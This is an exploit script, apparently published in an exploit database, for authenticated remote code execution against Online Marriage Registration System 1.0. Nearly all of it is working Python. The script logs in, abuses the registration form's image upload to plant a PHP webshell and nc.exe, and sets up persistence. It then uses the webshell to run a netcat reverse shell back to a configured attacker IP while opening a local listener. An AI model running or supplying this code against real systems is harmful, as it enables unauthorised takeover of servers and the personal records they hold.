# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-14-12 # Exploit Author: Andrea Bruschi - www.andreabruschi.net # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # Tested on: Windows 10 / Xampp Server and Wamp Server #!/usr/bin/python3 import requests import sys import os import iterm2 import AppKit url = sys.argv[1] mobile = sys.argv[2] password = sys.argv[3] # CONFIGURE HERE reverse_ip = '192.168.xx.xx' reverse_port = 4444 # CONFIGURE HERE # SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL netcat_path = '/local/path/to/nc.exe' shell_path = '/local/path/to/shell.php' def login(url, mobile, password): url = "{}/user/login.php".format(url) payload = {'mobno':mobile, 'password':password, 'login':''} req = requests.post(url, data=payload) cookie = req.cookies['PHPSESSID'] return cookie def upload(url, cookie, file=None): f = open(file, 'rb') filename, ext = os.path.splitext(file) if "exe" in ext: content_type = 'application/octet-stream' else: content_type = 'application/x-php' cookie = {'PHPSESSID':cookie} url = "{}/user/marriage-reg-form.php".format(url) files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''} req = requests.post(url, data=payload, cookies=cookie, files=files) print(f'[+] File {ext} uploaded') def get_remote_file(url, ext): url = "{}/user/images".format(url) req = requests.get(url) junk = req.text.split(ext)[0] f = junk[-42:] + ext return f def persistence(url, webshell, netcat): # webshell payload_w = "copy /y {} shell.php".format(webshell) url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w) req_w = requests.get(url_w) # netcat payload_n = "copy /y {} nc.exe".format(netcat) url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n) req_n= requests.get(url_n) print('[+] Persistence enabled') def get_reverse(url, ip, port): payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port) url_r = "{}/user/images/shell.php?cmd={}".format(url, payload) print('[+] Reverse shell incoming!') req = requests.get(url_r) # CONFIGURE HERE # THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER # YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY def start_listener(port): # Launch the app AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2") async def main(connection): app = await iterm2.async_get_app(connection) window = app.current_window if window is not None: cmd = "nc -lnv {}".format(port) await window.async_create_tab(command=cmd) else: print("No current window") iterm2.run_until_complete(main) if __name__ == "__main__": if len(sys.argv < 3): print("Usage: exploit.py ") else: cookie = login(url, mobile, password) upload(url, cookie, netcat_path) upload(url, cookie, shell_path) webshell = get_remote_file(url, '.php') netcat = get_remote_file(url, '.exe') persistence(url, webshell, netcat) start_listener(reverse_port) get_reverse(url, reverse_ip, reverse_port)